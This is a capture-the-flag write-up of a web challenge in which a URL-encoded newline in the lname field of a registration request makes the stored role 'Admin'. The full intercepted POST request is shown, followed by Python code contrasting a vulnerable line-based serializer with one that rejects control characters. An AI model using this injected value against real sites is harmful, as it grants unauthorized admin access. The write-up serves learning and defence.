You are on Level 3. You know that the users are stored on an ordinary text file. You also know that for this to work there are some parameter delimiters used. Your task is to create an account that would be an "admin" using nothing but the provided UI and login with it.
Target:
Tools:
Checking the normal behavior of the application.
Register a new account
Successful registration
You'll get forwarded to the created user's page
As you can see, our privileges are those of a normal user. If we go back to the description, it said:
You know that the users are stored on an ordinary text file. You also know that for this to work there are some parameter delimiters used.
Searching for Data Validation parameter delimiters, I found a good topic from OWASP.
I tried many delimiters in different places and figured out from the hints that the newline is the one. Converted to URL encoding, the newline is %0a,
so I added the user role after it.
So our request should look like this:
POST /ctf2/exercises/ex3.php HTTP/1.1
Host: ctf.infosecinstitute.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.infosecinstitute.com/ctf2/exercises/ex3.php
Cookie: PHPSESSID=7v78334lr06v6j051f4epsj3e6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

user=KINGSABRI1&password=123123&lname=LOL%0aAdmin&email=s%40s.com&register=Register
Now, let's intercept the registration request, then add our payload to get past.
Observation: All the information given in the description should have allowed me to know that the delimiter is a newline!
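Why the newline in `lname` changes the stored role, and the server-side check that blocks it, as an added example that is not part of the original write-up or the challenge's code. It assumes a hypothetical file layout of one field per line in the order user, password, email, lname, role; the real format used by ex3.php is not shown on the page, and all function names are illustrative.

```python
# Added example. Assumed layout: five lines per user (user, password, email,
# lname, role). The actual ex3.php storage format is not shown on the page.
import re
from urllib.parse import parse_qs

FIELDS = ("user", "password", "email", "lname")
RECORD_LINES = len(FIELDS) + 1  # four user-supplied fields plus the server-set role
# Control characters (CR, LF, NUL, ...) act as delimiters in a line-based file.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def serialize_naive(form):
    """Vulnerable writer: trusts field values, so a newline adds an extra line."""
    return "\n".join([form[f] for f in FIELDS] + ["normal"]) + "\n"


def serialize_hardened(form):
    """Hardened writer: refuses any value that contains a control character."""
    for f in FIELDS:
        if CONTROL_CHARS.search(form[f]):
            raise ValueError(f"control character in field {f!r}")
    return serialize_naive(form)


def parse_first_record(text):
    """Reader: takes the first RECORD_LINES lines as one user record."""
    lines = text.split("\n")[:RECORD_LINES]
    return dict(zip(FIELDS + ("role",), lines))


def decode_body(body):
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body).items()}


# Request body from the write-up above; the server decodes %0a to a newline.
BODY = ("user=KINGSABRI1&password=123123&lname=LOL%0aAdmin"
        "&email=s%40s.com&register=Register")

if __name__ == "__main__":
    form = decode_body(BODY)
    # The injected line lands where the reader expects the role.
    print(parse_first_record(serialize_naive(form)))
    try:
        serialize_hardened(form)
    except ValueError as exc:
        print("rejected:", exc)
```

The leftover `normal` line also shifts every record written after it, so a store like this needs validation on write and a format that does not depend on user-controlled line counts.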